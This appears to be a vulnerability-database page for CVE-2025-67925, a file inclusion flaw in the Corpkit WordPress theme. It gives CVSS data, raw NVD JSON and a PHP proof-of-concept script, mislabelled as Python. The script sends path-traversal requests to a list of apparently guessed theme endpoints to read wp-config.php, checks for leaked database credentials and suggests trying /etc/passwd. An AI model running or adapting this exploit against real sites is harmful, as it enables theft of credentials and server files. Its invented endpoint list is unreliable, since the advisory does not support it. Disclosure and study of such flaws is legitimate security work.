Security Vulnerability Report
中文
CVE-2025-67925 CVSS 7.5 HIGH

CVE-2025-67925

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:50

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion.This issue affects Corpkit: from n/a through <= 2.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Corpkit WordPress Theme <= 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67925 PoC - Corpkit Theme Local File Inclusion * Target: WordPress Corpkit Theme <= 2.0 * Type: Local File Inclusion (LFI) * * Usage: php cve-2025-67925_poc.php <target_url> <path_parameter> * Example: php cve-2025-67925_poc.php http://target.com "../../../../wp-config.php" */ $targetUrl = $argv[1] ?? ''; $pathParam = $argv[2] ?? '../../../wp-config.php'; if (empty($targetUrl)) { echo "Usage: php cve-2025-67925_poc.php <target_url> [path_parameter]\n"; echo "Example: php cve-2025-67925_poc.php http://target.com ../../../../wp-config.php\n"; exit(1); } // Common vulnerable endpoints in Corpkit theme $vulnerableEndpoints = [ '/wp-content/themes/corpkit/templates/file.php?file=', '/wp-content/themes/corpkit/include.php?file=', '/wp-content/themes/corpkit/functions.php?file=', '/?theme=corpkit&page=../../../../wp-config.php' ]; echo "[*] CVE-2025-67925 PoC - Corpkit Theme LFI\n"; echo "[*] Target: {$targetUrl}\n"; echo "[*] Path Parameter: {$pathParam}\n\n"; foreach ($vulnerableEndpoints as $endpoint) { $url = $targetUrl . $endpoint . urlencode($pathParam); echo "[+] Testing: {$url}\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode == 200 && !empty($response)) { echo "[!] Potential vulnerability confirmed!\n"; echo "[*] Response length: " . strlen($response) . " bytes\n"; // Check if sensitive content was leaked if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) { echo "[!] Sensitive file content leaked!\n"; } break; } } echo "\n[*] Note: Manual verification recommended.\n"; echo "[*] Try reading: /etc/passwd, wp-config.php, or other sensitive files.\n";

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67925", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.483", "lastModified": "2026-04-27T18:16:49.603", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion.This issue affects Corpkit: from n/a through <= 2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}